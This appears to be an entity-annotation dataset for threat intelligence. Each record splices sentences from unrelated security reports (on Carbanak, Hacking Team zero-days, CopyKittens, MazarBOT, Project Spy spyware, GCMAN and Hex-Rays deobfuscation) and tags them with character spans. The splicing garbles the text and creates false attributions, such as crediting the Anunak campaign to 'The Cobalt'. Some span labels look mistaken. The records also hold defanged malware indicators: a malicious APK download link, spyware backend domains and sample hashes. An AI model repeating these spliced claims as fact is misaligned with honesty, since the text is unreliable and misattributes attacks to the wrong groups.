initially found in the information dump . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . considering each block and instruction addresses . 
Standard file deletion commands are available on most operating system and device interfaces to perform cleanup , but adversaries may use other tools as well .", "spans": [{"start": 32, "end": 44, "label": "System"}, {"start": 61, "end": 68, "label": "System"}, {"start": 140, "end": 155, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 211, "end": 233, "label": "Organization"}, {"start": 283, "end": 291, "label": "Vulnerability"}, {"start": 296, "end": 302, "label": "System"}, {"start": 356, "end": 387, "label": "System"}, {"start": 474, "end": 485, "label": "Organization"}]} {"text": "One of these [ CVE-2015-5119 ] was a Flash zero-day . The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . The guessing is not 100% accurate however it works for the majority of obfuscated functions tested . Duqu uses a custom command and control protocol that communicates over commonly used ports , and is frequently encapsulated by application layer protocols.[5 ]", "spans": [{"start": 15, "end": 28, "label": "Vulnerability"}, {"start": 68, "end": 79, "label": "Organization"}, {"start": 230, "end": 252, "label": "Organization"}, {"start": 373, "end": 377, "label": "Organization"}, {"start": 385, "end": 420, "label": "System"}]} {"text": "The Windows kernel vulnerability ( CVE-2015-2387 ) existed in the open type font manager module ( ATMFD.dll ) and can be exploited to bypass the sandbox mitigation mechanism . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team . 
Though the original implementation assumes an obfuscated function has only one control flow dispatcher , Compromise", "spans": [{"start": 4, "end": 32, "label": "Vulnerability"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 98, "end": 107, "label": "Indicator"}, {"start": 187, "end": 199, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 255, "end": 268, "label": "System"}, {"start": 276, "end": 295, "label": "System"}, {"start": 336, "end": 341, "label": "Organization"}]} {"text": "The Flash zero-day exploit ( CVE-2015-5119 ) was added into the Angler Exploit Kit and Nuclear Exploit Pack . The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . some functions in the ANEL sample have multiple control dispatchers . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 29, "end": 42, "label": "Vulnerability"}, {"start": 64, "end": 82, "label": "Malware"}, {"start": 87, "end": 107, "label": "Malware"}, {"start": 114, "end": 120, "label": "Organization"}, {"start": 271, "end": 293, "label": "Organization"}, {"start": 395, "end": 401, "label": "System"}, {"start": 478, "end": 487, "label": "Organization"}, {"start": 517, "end": 527, "label": "Malware"}, {"start": 548, "end": 559, "label": "System"}, {"start": 562, "end": 570, "label": "Malware"}, {"start": 576, "end": 582, "label": "System"}, {"start": 585, "end": 591, "label": "Malware"}, {"start": 621, "end": 631, "label": "Malware"}, {"start": 660, "end": 666, "label": "System"}]} {"text": "It was also used in 
limited attacks in Korea and Japan . The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . Originally the code called the optblock_t : :f unc callback in MMAT_GLBOPT1 and MMAT_GLBOPT2 , By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": [{"start": 61, "end": 73, "label": "Organization"}, {"start": 82, "end": 95, "label": "System"}, {"start": 131, "end": 143, "label": "Organization"}, {"start": 155, "end": 177, "label": "Organization"}, {"start": 254, "end": 273, "label": "System"}, {"start": 286, "end": 298, "label": "System"}, {"start": 303, "end": 315, "label": "System"}]} {"text": "July 11 Two new Flash zero-day vulnerabilities , CVE-2015-5122 and CVE-2015-5123 , were found in the hacking team dump . The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . 
as the result was not correct in MMAT_CALLS ( detecting call arguments ) CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 16, "end": 46, "label": "Vulnerability"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 67, "end": 80, "label": "Vulnerability"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 147, "end": 160, "label": "System"}, {"start": 196, "end": 208, "label": "Organization"}, {"start": 220, "end": 242, "label": "Organization"}, {"start": 321, "end": 331, "label": "System"}, {"start": 361, "end": 393, "label": "Organization"}]} {"text": "July 13 Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System ( RCS ) agent installed in their targets \u2019 systems . If successful , Cobalt goes on to attack financial institutions outside the country . . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 81, "end": 98, "label": "Malware"}, {"start": 113, "end": 142, "label": "Malware"}, {"start": 204, "end": 210, "label": "Organization"}, {"start": 229, "end": 251, "label": "Organization"}, {"start": 276, "end": 383, "label": "Indicator"}, {"start": 430, "end": 461, "label": "Organization"}, {"start": 473, "end": 572, "label": "Indicator"}, {"start": 590, "end": 598, "label": "Organization"}, {"start": 609, "end": 626, "label": "System"}]} {"text": "July 14 A new zero-day vulnerability ( CVE-2015-2425 ) was found in Internet Explorer . 
The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled . However , DarkRace is a new ransomware group first discovered by researcher S!Ri .", "spans": [{"start": 14, "end": 36, "label": "Vulnerability"}, {"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 68, "end": 85, "label": "System"}, {"start": 139, "end": 152, "label": "System"}, {"start": 202, "end": 210, "label": "Organization"}, {"start": 268, "end": 272, "label": "Organization"}]} {"text": "July 16 On the mobile front , a fake news app designed to bypass Google Play was discovered . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens . this did not work for functions with three or more dispatchers . However , not all insider threats are intentional , according to an Insider Threat Report from Crowd Research Partners .", "spans": [{"start": 65, "end": 76, "label": "System"}, {"start": 239, "end": 253, "label": "Organization"}, {"start": 322, "end": 343, "label": "Organization"}, {"start": 385, "end": 396, "label": "Organization"}, {"start": 559, "end": 582, "label": "Organization"}]} {"text": "July 20 A new zero-day vulnerability ( CVE-2015-2426 ) was found in Windows , which Microsoft fixed in an out-of-band patch . CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program . 
Additionally , In early 2023 , KillMilk , the claimed founder of KillNet , attempted to ransom the purportedly stolen documents to NATO for 3 bitcoin , possibly in part to increase attention surrounding the activity .", "spans": [{"start": 14, "end": 36, "label": "Vulnerability"}, {"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 68, "end": 75, "label": "System"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 126, "end": 137, "label": "Organization"}, {"start": 272, "end": 287, "label": "System"}, {"start": 290, "end": 296, "label": "System"}, {"start": 325, "end": 331, "label": "System"}, {"start": 336, "end": 356, "label": "System"}, {"start": 363, "end": 366, "label": "System"}, {"start": 472, "end": 479, "label": "Organization"}]} {"text": "July 21 Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in . CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" . Hex-Rays kernel doesn\u2019t optimize some functions in MMAT_GLBOPT2 if it judges the optimization within the level is not required . To get in , the attacker used spear phishing emails with a self - extracting archive attachment pretending to be a voicemail .", "spans": [{"start": 24, "end": 34, "label": "Malware"}, {"start": 124, "end": 135, "label": "Organization"}, {"start": 168, "end": 181, "label": "System"}, {"start": 281, "end": 289, "label": "System"}, {"start": 332, "end": 344, "label": "System"}]} {"text": "July 28 A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team . 
Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . In this case , FULLHOUSE.DOORED is a backdoor written in C / C++ that communicates using HTTP .", "spans": [{"start": 76, "end": 81, "label": "System"}, {"start": 102, "end": 114, "label": "Organization"}, {"start": 148, "end": 159, "label": "Organization"}, {"start": 164, "end": 174, "label": "System"}, {"start": 297, "end": 305, "label": "System"}, {"start": 372, "end": 378, "label": "System"}, {"start": 383, "end": 393, "label": "System"}, {"start": 446, "end": 462, "label": "Malware"}, {"start": 466, "end": 524, "label": "Malware"}]} {"text": "Android users warned of malware attack spreading via SMS FEB 16 , 2016 Security researchers are warning owners of Android smartphones about a new malware attack , spreading via SMS text messages . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 . the callback is executed just once in the implementation . The campaign was carried out in late 2020 , but it was detected , analyzed , and published in late March 2021 .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 114, "end": 121, "label": "System"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}]} {"text": "As the team at Scandinavian security group CSIS describes , malware known as MazarBOT is being distributed via SMS in Denmark and is likely to also be encountered in other countries . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools . 
To handle multiple control flow dispatchers , In one case , certutil was used to decode multiple files related to credential theft .", "spans": [{"start": 43, "end": 47, "label": "Organization"}, {"start": 77, "end": 85, "label": "Malware"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 271, "end": 275, "label": "System"}, {"start": 288, "end": 317, "label": "System"}]} {"text": "Victims \u2019 first encounter with the malware reportedly comes via an unsolicited text message that their Android smartphone receives . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . a callback for decompiler events was implemented . Most 51 are due to carelessness , negligence , or compromised credentials , but the potential impact is still present even in an unintentional scenario .", "spans": [{"start": 103, "end": 121, "label": "System"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 388, "end": 411, "label": "Vulnerability"}]} {"text": "The txt message uses social engineering to dupe unsuspecting users into clicking on a link to a downloadable Android application . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . 
The code catches the "hxe_prealloc" event (according to Hex-Rays, this is the final event for optimizations). Typically this event occurs a few times to several times, then calls the optblock_t::func callback, so the callback can deobfuscate multiple control flow flattenings. Other additional modifications were made to the code (e.g., writing a new algorithm for finding the control flow dispatcher and first block, validating a block comparison variable, and so on). After the modification, the following functions with multiple control flow dispatchers can be unflattened.

The original implementation supports the following two cases of flattened blocks to find a block comparison variable for the next block (the cases are then simplified): the block comparison variable is searched in each block of endsWithJcc and nonJcc. If the next block is resolved, the CFG (specifically mblock_t::predset and mblock_t::succset) and the destination of the goto jump instruction are updated. In the second case, the code tracks the block comparison variable in each predecessor and more (if any conditional blocks come before the predecessor) to identify each next block for unflattening.

In the third case that was implemented, the block comparison variables are not assigned in the flattened blocks but rather in the first blocks, according to a condition. For example, the following microcode graph shows edi is assigned to esi (the block comparison variable in this case) in block number 7, but the edi value is assigned in block numbers 1 and 2. If the immediate value for the block comparison variable is not found in the flattened blocks, the new code tries to trace the first blocks to obtain the value and reconnects block numbers 1 and 2 as successors of block number 7, in addition to the normal operations mentioned in the original cases. In this case, the code parses the structure in the first blocks, then reconnects each conditional block under the flattened blocks (#1 and #2 as successors of #13, #3 and #4 as successors of #11).

Last, but not least, in all cases explained here, the tail instruction of the dispatcher predecessor can be a conditional jump like jnz, not just goto. The modified code checks the tail instruction and, if the true-case destination is a control flow dispatcher, it updates the CFG and the destination of the instruction.

The following changes are minor compared with the above referenced ones. Additional jump instructions are supported when collecting block comparison variable candidates and mapping between the variable and ea or block number (jnz/jle in JZCollector, jnz in JZMapper).

CSIS provided a (sanitised) version of a typical message to warn users what to look out for: "You have received a multimedia message from +[country code] [sender number] Follow the link http://www.mmsforyou[.]net/mms.apk to view the message". Once the APK package is downloaded, potential victims are urged to grant the malicious app a wide range of permissions on their Android device. App permissions: SEND_SMS, RECEIVE_BOOT_COMPLETED, INTERNET, SYSTEM_ALERT_WINDOW, WRITE_SMS, ACCESS_NETWORK_STATE, WAKE_LOCK, GET_TASKS, CALL_PHONE, RECEIVE_SMS, READ_PHONE_STATE, READ_SMS, ERASE_PHONE. Once installed, MazarBOT downloads a copy of Tor onto users' Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim's location to an Iranian mobile phone number. With the malware now in place, a number of actions can be performed, including allowing attackers to secretly monitor and control smartphones via a backdoor, send messages to premium-rate numbers, and intercept two-factor authentication codes sent by online banking apps and the like. In fact, with full access to the compromised Android smartphone, the opportunities for criminals to wreak havoc are significant, such as erasing infected phones or launching man-in-the-middle (MITM) attacks. In its analysis, CSIS notes that MazarBOT was reported by Recorded Future last November as being actively sold in Russian underground forums and, intriguingly, the malware will not activate on Android devices configured with Russian language settings. This, in itself, does not prove that the perpetrators of the malware campaign are based in Russia, but it certainly sounds as if that is a strong possibility. Malware authors in the past have often coded a "safety net" into their malware to prevent them from accidentally infecting their own computers and devices. For more detailed information about the threat, check out the blog post from CSIS. And, of course, remember to always be wary of unsolicited, unusual text messages and of installing apps from third-party sources on your Android smartphone.

Gallmaker's activity appears to be highly targeted, with its victims all related to government, military, or defense sectors. Gallmaker's targets are embassies of an Eastern European country. There are no obvious links between the Eastern European and Middle Eastern targets, but it is clear that Gallmaker is specifically targeting the defense, military, and government sectors. The group has carried out attacks most months since December 2017. Its activity subsequently increased in the second quarter of 2018, with a particular spike in April 2018. The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect. Gallmaker may well have continued to avoid detection were it not for Symantec's technology. In this instance, Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious, leading to the discovery of this new campaign. Without Symantec's advanced AI-based capabilities, Gallmaker's activities may well have remained undetected.

The Gamaredon Group primarily makes use of compromised domains, dynamic DNS providers, Russian and Ukrainian country code top-level domains (ccTLDs), and Russian hosting providers to distribute their custom-built malware. Previously, LookingGlass reported on a campaign they named "Operation Armageddon", targeting individuals involved in the Ukrainian military and national security establishment. The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government. Periodically, researchers at Palo Alto Networks hunt through WildFire execution reports, using AutoFocus, to identify untagged samples' artifacts in the hopes of identifying previously undiscovered malware families, behaviors, and campaigns. Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon. The earliest discovered sample (based on compile times and sandbox submission times) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro. The scripts would also use wget to send POST requests to command and control (C2) servers that would contain information about the compromised system. These VNC executables would either be included in the SFX file or downloaded by the batch script. The batch script would then attempt to have the VNC program connect to a command and control (C2) server to enable the server to control the compromised system. While the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from applications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe.

Coronavirus Update App Leads to Project Spy Android and iOS Spyware
We discovered a cyberespionage campaign we have named Project Spy infecting Android and iOS devices with spyware by using the coronavirus disease (Covid-19) as a lure.
By: Tony Bao, Junzhi Lu, April 14, 2020
We discovered a potential cyberespionage campaign, which we have named Project Spy, that infects Android and iOS devices with spyware (detected by Trend Micro as AndroidOS_ProjectSpy.HRX and IOS_ProjectSpy.A, respectively). Project Spy uses the ongoing coronavirus pandemic as a lure, posing as an app called Coronavirus Updates. We also found similarities in two older samples disguised as a Google service and, subsequently, as a music app after further investigation. However, we have noted a very small number of downloads of the app in Pakistan, India, Afghanistan, Bangladesh, Iran, Saudi Arabia, Austria, Romania, Grenada, and Russia.

Project Spy routine
At the end of March 2020, we came across an app masquerading as a coronavirus update app, which we named Project Spy based on the login page of its backend server. This app carries a number of capabilities:
- Upload GSM, WhatsApp, Telegram, Facebook, and Threema messages
- Upload voice notes, contacts stored, accounts, call logs, location information, and images
- Upload the expanded list of collected device information (e.g., IMEI, product, board, manufacturer, tag, host, Android version, application version, name, model brand, user, serial, hardware, bootloader, and device ID)
- Upload SIM information (e.g., IMSI, operator code, country, MCC-mobile country, SIM serial, operator name, and mobile number)
- Upload wifi information (e.g., SSID, wifi speed, and MAC address)
- Upload other information (e.g., display, date, time, fingerprint, created at, and updated at)
The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database. It requests permission to access the additional storage.

Project Spy's earlier versions
Searching for the domain in our sample database, we found that the coronavirus update app appears to be the latest version of another sample that we detected in May 2019. The first version of Project Spy (detected by Trend Micro as AndroidOS_SpyAgent.HRXB) had the following capabilities:
- Collect device and system information (i.e., IMEI, device ID, manufacturer, model and phone number), location information, contacts stored, and call logs
- Collect and send SMS
- Take pictures via the camera
- Upload recorded MP4 files
- Monitor calls
Searching further, we also found another sample that could be the second version of Project Spy. This version appeared as Wabi Music, and copied a popular video-sharing social networking service as its backend login page. In this second version, the developer's name listed was "concipit1248" in Google Play, and it may have been active between May 2019 and February 2020. This app appears to have become unavailable on Google Play in March 2020. The second Project Spy version has similar capabilities to the first version, with the addition of the following:
- Stealing notification messages sent from WhatsApp, Facebook, and Telegram
- Abandoning the FTP mode of uploading the recorded images
Aside from changing the app's supposed function and look, the second and third versions' codes had little differences.

Potentially malicious iOS connection
Using the codes and "Concipit1248" to check for more versions, we found two other apps in the App Store. Further analysis of the iOS app "Concipit1248" showed that the server used, spy[.]cashnow[.]ee, is the same one used in the Android version of Project Spy. However, although the "Concipit1248" app requested permissions to open the device camera and read photos, the code can only upload a self-contained PNG file to a remote server. This may imply the "Concipit1248" app is still incubating. The other iOS app "Concipit Shop" from the same developer appeared normal and was last updated in November 2019. Apple has confirmed that the iOS apps are not functioning based on analysis of the codes, and stated that the sandbox is able to detect and block these malicious behaviors.

Conclusion
The "Corona Updates" app had relatively low downloads in Pakistan, India, Afghanistan, Bangladesh, Iran, Saudi Arabia, Austria, Romania, Grenada, and Russia. Perhaps the app's false capabilities also fueled the low number of downloads. It also appears the apps may still be in development or incubation, maybe waiting for a "right time" to inject the malicious codes. It's also possible that the apps are being used to test other possible techniques. A possible indication for timing might be when the app reaches a specific number of downloads or infected devices. The coding style suggests that the cybercriminals behind this campaign are amateurs. The incomplete iOS codes used in this campaign may have been bought while other capabilities appear to have been added. This may also explain the timing in between the apps becoming fully functional and "incubation." Users are cautioned to research and check reviews before they download apps. Observe and look at the app's display and text, stated functions, reviews from other users, and requested permissions before downloading. Make sure that all other apps installed and the device operating systems are updated to the latest version.

Today at the Security Analyst Summit (SAS 2016), Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies, Metel and GCMAN, and the reemergence of the Carbanak group with new targets in its sights. In 2015, Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups. Kaspersky Lab is releasing crucial Indicators of Compromise (IOCs) and other data to help organizations search for traces of these attack groups in their corporate networks. In all, Kaspersky Lab discovered Metel in more than 30 financial institutions. Our investigations revealed that the attackers drove around several cities in Russia, stealing money from ATMs belonging to different banks. It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware. A second group, which we call GCMAN because the malware is based on code compiled on the GCC compiler, emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services. Once inside the network, the GCMAN group uses legitimate and penetration testing tools such as PuTTY, VNC, and Meterpreter for lateral movement. Our investigation revealed an attack where the GCMAN group then planted a cron script into the bank's server, sending financial transactions at the rate of $200 per minute. The GCMAN group used an MS SQL injection in commercial software running on one of the bank's public web services, and about a year and a half later, they came back to cash out. During that time they poked 70 internal hosts, compromised 56 accounts, making their way from 139 attack sources (TOR and compromised home routers). Kaspersky Lab's research team responded to three financial institutions in Russia that were infected with the GCMAN malware. The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them, using the same APT-style tools and techniques. Just a few months later, in February 2015, we announced the discovery of Carbanak, a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries. However, in September last year, our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers. In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company.

Recently Subaat drew our attention due to renewed targeted attack activity. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have already been depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group. Starting in February 2018, Palo Alto Networks Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom, Spain, Russia, and the United States. Gorgon Group used common URL shortening services to download payloads. As this is a group we have not observed before, we will continue monitoring this campaign for further developments.

The difference between ProxyNotShell and the newly discovered exploit method we are calling OWASSRF. The regex, and thus the rule, will match only the requests made to the endpoint of the Microsoft Exchange server. This type of vulnerability is known as a server-side request forgery (SSRF). Based on these findings, CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022-41080.

In the past, we have seen such occurrences with Magecart threat actors, for example in the breach of the Umbro website. Akamai notes that they identified multiple compromised websites that had similarities. In those instances, the malicious code was actually embedded in the Google Tag Manager library itself, which is very clever and difficult to detect.

Limited forensic evidence existed to determine exactly how TIEDYE was deployed to systems in the victim environment; however, like STRATOFEAR, TIEDYE was likely deployed as a second-stage backdoor by FULLHOUSE.DOORED. JumpCloud reported this unauthorized access impacted fewer than five customers and less than 10 devices. The overlaps in targeting and sharing of infrastructure amongst DPRK groups highlight the continued targeting and coordinated interest in the cryptocurrency field. APT38's increasingly aggressive targeting against banks.

While Mandiant was unable to determine the initial intrusion point, our analysis suggests the OT component of this attack may have been developed in as little as two months. The syntax of the command fragment includes "scilc.exe", a native utility that is part of the MicroSCADA software suite.

Lastly, we emphasize that although the samples of COSMICENERGY we obtained are potentially red team related, threat actors regularly leverage contractors and red team tools in real world threat activity, including during OT attacks.

Based on available information Mandiant has not been able to assess a general location that the group operates from.

A New Threat on the Horizon: CL0P
Simultaneously, a new variant of Monti, based on the Linux platform, has surfaced, demonstrating notable differences from its previous Linux-based versions. Rhysida appears to have first popped up back in May, with several high-profile compromises posted on their leak site. While a sudden dip in attacks isn't too unusual for top ransomware gangs, it's worth mentioning that in last month's review we speculated that Royal might be going through a rebrand. If passed, it would require U.S. financial institutions hit with ransomware to notify the Director of the Treasury Department's Financial Crimes Enforcement Network with details of the attack and the ransom demand.

Threat intelligence is simply information about threats. They collect, process, and analyze data about cyberthreats from a variety of public and private sources, creating timely, actionable, and engaging intelligence to keep organizations and our global partners up-to-date about today's threat landscape. Most organizations receive and make use of intelligence published from third parties such as government agencies, specialist providers or collaborative groups.

Honeypot Alerts
Set up a honeypot mechanism to attract interest from adversaries.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

There are three main subroutines: the first is launched when the document is opened (e.g., Auto_Open, Workbook_Open), the second creates a randomly named dynamic loading library (DLL) file in the user's temporary files folder, and the third creates a randomly named shortcut (LNK) file which contains code to run regsvr32.exe (or rundll32.exe) to launch the next stage.

The malware verifies that the server is authentic by downloading a signature file that is signed by the server and ensuring that it is the right one, to make the operation more resilient to takedowns.

The four-byte value at offset 0x416 (0x3e8 or decimal 1000) is the backdoor's version number.

Back in 2013, CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news, an Israeli newspaper.

It is attributed to Iranian state-sponsored APT Charming Kitten, whose other recent attacks include targeting world leaders attending the Munich Security Conference and the T20 Summit in Saudi Arabia in an effort to steal their email credentials, targeting Israeli scholars and U.S. government employees in another credential-stealing effort last July, and also attacking the reelection effort of former President Donald Trump.

One interesting detail about Hack520 is his apparent love for pigs, as seen in his use of the word in his email addresses. And, while one of his signatures uses his own blog domain, there is also a second signature which uses 93[.]gd, a domain that was found to have been actively selling VPS services in the past.

If you want a good example, just look at the infection map for Flame: it is tightly grouped around the Gulf States.

For example, Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader, one of the most popular PDF reader alternatives to Adobe Acrobat.

An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021.

Symantec has identified MuddyWater as responsible for a new cyberespionage campaign targeting telecommunication and IT service providers in Asia and the Middle East for over six months.

According to Kaspersky telemetry, targeted organizations included think tanks and individuals working in various areas related to security and geopolitics.

Geographically, most victims are located in Europe, specifically Italy.

The goal of this type of threat is often to shame or embarrass.

As we've already previously discussed in our 2017 predictions, these groups will constantly evolve and employ unique and advanced attack techniques. This also ties into the fact that cyber criminals are competitive by nature, and they love the challenge their actions bring.

As the victims of commercial spyware are highly targeted individuals, the sobering truth is that some attackers have the means to be able to spend six figures to compromise a single target.

This plan should outline specific actions and procedures for attack mitigation and remediation, including guidelines for addressing extortion demands.

When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users, the company's then-CEO Noel Biderman was quick to point the finger at an unnamed former contractor.
jnz in JZMapper ) The PDFs used highly relevant , well - crafted content that fabricated human rights seminar information and Ukraine \u2019s foreign policy and NATO membership plans , and were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": [{"start": 109, "end": 121, "label": "Organization"}, {"start": 188, "end": 196, "label": "System"}, {"start": 401, "end": 436, "label": "System"}]} {"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . . On April 16 , 2022 , KillNet dedicated its attack on a U.S. energy company to REvil .", "spans": [{"start": 51, "end": 115, "label": "Indicator"}, {"start": 116, "end": 139, "label": "Indicator"}, {"start": 140, "end": 204, "label": "Indicator"}, {"start": 230, "end": 294, "label": "Indicator"}, {"start": 299, "end": 310, "label": "Organization"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 359, "end": 368, "label": "Organization"}, {"start": 373, "end": 395, "label": "Organization"}, {"start": 509, "end": 516, "label": "Organization"}, {"start": 543, "end": 562, "label": "Organization"}, {"start": 566, "end": 571, "label": "Organization"}]} {"text": "AndroidOS_ProjectSpy.HRX 3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ . APT38 has paralleled North Korea 's worsening financial condition . An entropy threshold adjustment due to check in high maturity level . 
Knowing what motivates hackers is a key part of keeping them out of your business", "spans": [{"start": 25, "end": 89, "label": "Indicator"}, {"start": 90, "end": 106, "label": "Indicator"}, {"start": 112, "end": 123, "label": "Indicator"}, {"start": 124, "end": 129, "label": "Organization"}]} {"text": "] ee Backend server ftp [ . On much of the C2 infrastructure we identified several crimeware family samples . Multiple block tracking for getting block comparison variable . None Why are Cyber Criminals More Likely to Target Small to Midsize Businesses \"", "spans": [{"start": 13, "end": 27, "label": "Indicator"}, {"start": 187, "end": 202, "label": "Organization"}, {"start": 225, "end": 252, "label": "Organization"}]} {"text": "] XXXX [ . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns . And the last change that was introduced in regards to ConfuserEx obfuscator , an obfuscator that is very commonly used by malicious actors to obfuscate .NET code , is used with various levels of obfuscation , anti - tampering and anti - debugging , which makes the unpacking more difficult for malware researchers .", "spans": [{"start": 97, "end": 109, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 189, "end": 211, "label": "Organization"}, {"start": 300, "end": 310, "label": "System"}, {"start": 368, "end": 384, "label": "Organization"}, {"start": 398, "end": 407, "label": "Malware"}]} {"text": "] com Backend server spy [ . 360 and Tuisec already identified some Gorgon Group members . the block update variable referred in the overview . 
Cybercriminals continue to identify and exploit an organizations weak spots and use common even basic techniques , including phishing or remote desktop protocol RDP to launch ransomware attacks , gain access to sensitive data , disrupt operations and , in some cases , put lives at risk .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 29, "end": 32, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}, {"start": 68, "end": 80, "label": "Organization"}, {"start": 81, "end": 88, "label": "Organization"}]} {"text": "] cashnow [ . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks . Some functions in the ANEL sample utilize this , As these attacks continue to grow , security teams need tools to help save time and address the threats more effectively .", "spans": [{"start": 14, "end": 18, "label": "System"}, {"start": 27, "end": 32, "label": "System"}, {"start": 55, "end": 62, "label": "System"}, {"start": 162, "end": 166, "label": "Malware"}, {"start": 225, "end": 239, "label": "Organization"}]} {"text": "] ee Backend server xyz [ . it 's not known if the attackers physically reside in Pakistan . however the assignment is a little bit tricky . Specifically , the exec_signing_id field within the XPdb contains 